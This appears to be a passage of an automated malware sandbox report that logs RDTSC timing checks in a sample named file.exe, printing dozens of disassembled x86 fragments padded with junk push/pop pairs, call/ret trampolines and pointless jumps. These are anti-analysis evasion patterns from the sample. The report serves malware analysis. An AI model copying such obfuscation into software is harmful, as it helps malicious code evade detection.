Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F87B second address: A8F8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FDE8C51D4D8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub ebx, 62742ADEh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c mov di, bx 0x0000002f jl 00007FDE8C51D4D9h 0x00000035 xchg eax, esi 0x00000036 je 00007FDE8C51D4E2h 0x0000003c jnc 00007FDE8C51D4DCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EB56 second address: A8EB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9371B second address: A937D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDE8C51D4D8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FDE8C51D4D8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov ebx, edi 0x00000044 sub edi, dword ptr [ebp+122D28CCh] 0x0000004a push 00000000h 0x0000004c mov di, 18ECh 0x00000050 call 00007FDE8C51D4E7h 0x00000055 add ebx, dword ptr [ebp+122D2C6Bh] 0x0000005b pop ebx 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push edi 0x0000005f jmp 00007FDE8C51D4DFh 0x00000064 pop edi 0x00000065 jmp 00007FDE8C51D4DCh 0x0000006a popad 0x0000006b push eax 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A946B5 second address: A946BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A946BC second address: A94756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8C51D4D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jmp 00007FDE8C51D4E8h 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FDE8C51D4D8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FDE8C51D4DCh 0x0000004f push 00000000h 0x00000051 or dword ptr [ebp+122D226Ch], eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94756 second address: A94760 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A957B1 second address: A957C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FDE8C51D4D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9DD3B second address: A9DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D47E second address: A9D4D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4EFh 0x00000008 pushad 0x00000009 js 00007FDE8C51D4D6h 0x0000000f jmp 00007FDE8C51D4E5h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDE8C51D4E2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D4D2 second address: A9D4D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D66D second address: A9D69F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8C51D4E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D69F second address: A9D6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FF00 second address: A9FF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA155D second address: AA1561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1561 second address: AA1575 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDE8C51D4D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1575 second address: AA1584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1584 second address: AA1592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1592 second address: AA1596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1596 second address: AA15B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9390B second address: A93910 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A959B2 second address: A959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6981 second address: AA699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FDE8CE8B4C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FDE8CE8B4C8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6A72 second address: AA6A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B5E second address: AA6B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4D1h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B81 second address: AA6B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B90 second address: AA6B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6B9F second address: AA6BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BA3 second address: AA6BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8CE8B4CBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BBA second address: AA6BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6BBF second address: AA6BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C84 second address: AA6C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C92 second address: 8CEC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007FDE8CE8B4C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 38407B17h 0x00000015 pushad 0x00000016 sbb eax, 17023EB2h 0x0000001c push edx 0x0000001d push edx 0x0000001e pop eax 0x0000001f pop edi 0x00000020 popad 0x00000021 push dword ptr [ebp+122D021Dh] 0x00000027 jmp 00007FDE8CE8B4D1h 0x0000002c call dword ptr [ebp+122D1DD7h] 0x00000032 pushad 0x00000033 jnp 00007FDE8CE8B4C7h 0x00000039 xor eax, eax 0x0000003b pushad 0x0000003c xor dword ptr [ebp+122D1CC9h], ecx 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 jne 00007FDE8CE8B4D4h 0x0000004d mov dword ptr [ebp+122D2BBBh], eax 0x00000053 clc 0x00000054 mov esi, 0000003Ch 0x00000059 mov dword ptr [ebp+122D1D82h], esi 0x0000005f mov dword ptr [ebp+122D1CC9h], esi 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 xor dword ptr [ebp+122D1D82h], edi 0x0000006f lodsw 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1D82h], edx 0x0000007c mov dword ptr [ebp+122D1CC9h], eax 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 jmp 00007FDE8CE8B4D4h 0x0000008b push eax 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB5E8 second address: AAB5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C07 second address: A42C1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C1C second address: A42C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8C51D4E1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA36E second address: AAA38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop ebx 0x0000000b jns 00007FDE8CE8B4CCh 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FDE8CE8B4CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA38F second address: AAA399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA399 second address: AAA3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA3B0 second address: AAA3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA935 second address: AAA93F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE7F second address: AAAE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE86 second address: AAAE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE93 second address: AAAE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAE9F second address: AAAEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEA5 second address: AAAEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEAA second address: AAAEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAAEB0 second address: AAAEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB15E second address: AAB16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB16E second address: AAB178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8C51D4D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB178 second address: AAB1B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4F5h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAB316 second address: AAB32A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDE8C51D4D6h 0x0000000e ja 00007FDE8C51D4D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF708 second address: AAF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF70E second address: AAF712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF712 second address: AAF725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF725 second address: AAF74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FDE8C51D4EFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF74A second address: AAF769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D5h 0x00000009 je 00007FDE8CE8B4C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8EC second address: AAF91F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDE8C51D4E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDE8C51D4E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAFA7C second address: AAFA82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAFA82 second address: AAFAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DDh 0x0000000b push edi 0x0000000c jmp 00007FDE8C51D4DCh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDE8C51D4E2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0158 second address: AB0161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0161 second address: AB0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0569 second address: AB056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB056D second address: AB0573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0573 second address: AB0579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0579 second address: AB059D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDE8C51D4DCh 0x00000008 js 00007FDE8C51D4D6h 0x0000000e pop esi 0x0000000f jl 00007FDE8C51D4E2h 0x00000015 jg 00007FDE8C51D4D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0729 second address: AB0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0746 second address: AB0751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FDE8C51D4D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8F73 second address: AB8FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FDE8CE8B4C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jbe 00007FDE8CE8B4E5h 0x00000015 jmp 00007FDE8CE8B4CFh 0x0000001a jmp 00007FDE8CE8B4D0h 0x0000001f pushad 0x00000020 push eax 0x00000021 jmp 00007FDE8CE8B4CFh 0x00000026 jnl 00007FDE8CE8B4C6h 0x0000002c pop eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7757A second address: A775A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+1245066Fh] 0x00000012 lea eax, dword ptr [ebp+1247C2FEh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A775A1 second address: A775A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7764F second address: A77653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77BF8 second address: A77C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77C10 second address: A77C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D13 second address: A77D5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007FDE8CE8B4C6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FDE8CE8B4CCh 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 jo 00007FDE8CE8B4D2h 0x00000029 jne 00007FDE8CE8B4CCh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D5E second address: A77D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77D69 second address: A77D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77E20 second address: A77E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77E26 second address: A77E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8CE8B4D8h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007FDE8CE8B4CCh 0x00000013 jo 00007FDE8CE8B4CCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77F85 second address: A77F9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8C51D4DCh 0x00000008 ja 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77F9A second address: A77FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FDE8CE8B4C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push ebx 0x00000022 ja 00007FDE8CE8B4C8h 0x00000028 pop edx 0x00000029 add edi, 5F85A936h 0x0000002f push 00000004h 0x00000031 add dword ptr [ebp+122D2A0Bh], esi 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FDE8CE8B4D3h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A78385 second address: A7838A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
